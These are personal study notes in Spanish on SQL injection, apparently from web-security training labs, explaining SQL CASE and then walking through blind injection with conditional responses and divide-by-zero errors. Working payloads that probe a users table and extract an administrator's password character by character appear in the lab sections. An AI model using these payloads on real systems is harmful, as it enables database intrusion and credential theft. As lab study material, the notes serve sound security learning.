---
tags:
  - sqli
  - conditional_error
---
## Teoría
*Conceptos nuevos*

*`SELECT CASE en SQL`*
---
   ```sql
   SELECT 
       CASE 
           WHEN condition1 THEN result1
           WHEN condition2 THEN result2
           ...
           ELSE defaultResult
       END AS columnAlias
   FROM tableName;
   ```

   - Evalúa las condiciones en orden.
   - Devuelve el resultado correspondiente a la primera condición verdadera.
   - Si ninguna condición es verdadera, devuelve `defaultResult`.

**Ejemplo**:
   ```sql
   SELECT FirstName, LastName, Salary,
       CASE 
           WHEN Salary < 40000 THEN 'Low'
           WHEN Salary >= 40000 AND Salary < 70000 THEN 'Medium'
           WHEN Salary >= 70000 THEN 'High'
           ELSE 'Unknown'
       END AS SalaryCategory
   FROM Employees;
   ```

 **Aplicación**:
   - Clasifica los salarios en 'Low', 'Medium', 'High'.
   - Si `Salary < 40000`, `SalaryCategory` será 'Low'.
   - Condiciones se evalúan secuencialmente, deteniéndose en la primera verdadera.

Supongamos que tienes una tabla `Employees` con los siguientes datos:

| EmployeeID | FirstName | LastName | Salary |
|------------|-----------|----------|--------|
| 1          | John      | Doe      | 35000  |
| 2          | Jane      | Smith    | 50000  |
| 3          | Bob       | Johnson  | 75000  |
La consulta dada producirá el siguiente resultado:

| EmployeeID | FirstName | LastName | Salary | SalaryCategory |
| ---------- | --------- | -------- | ------ | -------------- |
| 1          | John      | Doe      | 35000  | Low            |
| 2          | Jane      | Smith    | 50000  | Medium         |
| 3          | Bob       | Johnson  | 75000  | High           |
|            |           |          |        |                |

*`SQL Ciega`*
---
```sql
SELECT
    *
FROM
    Users
WHERE
    TrackingId = 'xyz'
    AND (
        SELECT
            CASE
                WHEN (
                    Username = 'Admin'
                    AND SUBSTRING(Password, 1, 1) > 'm'
                ) THEN 1 / 0
                ELSE 'a'
            END
    ) = 'a';
```

*Seleccióname el primer carácter de la contraseña del administrador y compara si es superior a m, si no cumple la condición, devuelve error*

- Utiliza `CASE` para desencadenar un error si la condición es verdadera.
- Ayuda a inferir información sobre la base de datos basándose en la respuesta del error

*`La expresión AND 1=0`* 
> Siempre será falsa en SQL, ya que 1 no es igual a 0. Sin embargo, el comportamiento de la consulta puede variar dependiendo del sistema de gestión de bases de datos (DBMS) y cómo maneje los errores o condiciones falsas.

> En muchos sistemas de gestión de bases de datos, como MySQL o MariaDB, una expresión falsa en una condición `WHERE` simplemente significa que no se devolverán filas que cumplan esa condición, pero no generará un error. La consulta se ejecutará sin problemas, pero no devolverá ningún resultado que cumpla con la condición `AND 1=0`. En MySQL, al igual que en muchos otros sistemas de gestión de bases de datos (DBMS), **una división por cero genera un error**, por lo tanto podemos usar sqli injection con condicionales para generar o no un error (igual que el mensaje de *Welcome back*).


### Lab
Continuando con _Bind SQL injection with conditional response_

Este payload te permite saber si la tabla users existe
`' AND (SELECT 'a' FROM users LIMIT 1)='a' --`
Este payload te permite saber si el usuario administrador existe
`' AND (SELECT 'a' FROM users WHERE username='administrator')='a' --`
Este payload te permite saber la longitud de la contraseña
`' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a' --`

Para saber la longitud de la contraseña lo mandamos al intruder
![[Pasted image 20240611152353.png]]

**Payload:** Numbers 1-30
**Settings:**
![[Pasted image 20240611152654.png]]

El resultado nos indica que tiene 20 carácteres:
![[Pasted image 20240611152839.png]]

Por último hacemos el mismo proceso para obtener la contraseña
 ![[Pasted image 20240611153123.png]]
En el payload ponemos simple list con letras de la a-z y números (sigue con el grep match de welcome back)

Por último vamos letra a letra
![[Pasted image 20240611153401.png]]

Y al final consigues la contraseña

![[Pasted image 20240611154840.png]]


## Lab
*Blind SQL injection with conditional errors*


Empezamos viendo que realmente hay un **sqli** y con una condición normal no produce errores
![[Pasted image 20240611203009.png]]

Luego vemos como **se produce un error al dividir un número entre 0**
![[Pasted image 20240611203147.png]]


### Conclusiones
- En los blind SQL hay que tener paciencia, tuve que mirar la respuesta porque probé de todo (incluso ffuf) y no me funcionaba. El payload era correcto, revisaba los caracteres, pero me faltaba saber la longitud de la contraseña. A parte me hubiera sido útil conocer previamente la característica de grep match en el resultado. **(PRIMER LAB)**

### Apuntes creados
[[1. Error-based SQL injection]]
[[2. Exploiting blind SQL injection by triggering conditional errors]]

### Estado del proyecto
*Nada ha cambiado por hoy*